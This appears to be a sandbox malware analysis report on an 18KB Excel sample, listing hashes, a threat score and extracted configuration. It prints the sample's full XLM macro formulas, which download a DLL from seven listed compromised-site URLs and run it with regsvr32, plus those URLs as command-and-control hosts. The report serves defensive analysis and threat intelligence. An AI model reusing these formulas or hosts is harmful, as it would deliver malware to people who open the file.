General

  • Target

    58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562

  • Size

    18KB

  • Sample

    240909-1tmylascpk

  • MD5

    8762ebe9984b59c40d367382f168e840

  • SHA1

    efe05b3e0184dda4f69be941c13b11ad0219b354

  • SHA256

    58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562

  • SHA512

    131d069291c8b3433e7b61971684e0209ee5e6da87e7678ce6827050768c96d00121f1f94842b88fd42bdb3856d069845f34a53e65b99a89e54c5465594a1ab0

  • SSDEEP

    384:uCJj6woT13+oZ7lI+IKeVBZqt7crLqp77x5qZghI0qAztDM/:uC93oxrZ72+/ecmqp7q2hI0rt2

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/

http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/

http://www.cafe-kwebbel.nl/layouts/3Wkev/

http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/

http://borbajardinagem.com.br/erros/vlB3f6XpsZG/

http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/

http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cafe-kwebbel.nl/layouts/3Wkev/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://borbajardinagem.com.br/erros/vlB3f6XpsZG/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Targets

    • Target

      58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562

    • Size

      18KB

    • MD5

      8762ebe9984b59c40d367382f168e840

    • SHA1

      efe05b3e0184dda4f69be941c13b11ad0219b354

    • SHA256

      58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562

    • SHA512

      131d069291c8b3433e7b61971684e0209ee5e6da87e7678ce6827050768c96d00121f1f94842b88fd42bdb3856d069845f34a53e65b99a89e54c5465594a1ab0

    • SSDEEP

      384:uCJj6woT13+oZ7lI+IKeVBZqt7crLqp77x5qZghI0qAztDM/:uC93oxrZ72+/ecmqp7q2hI0rt2

    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks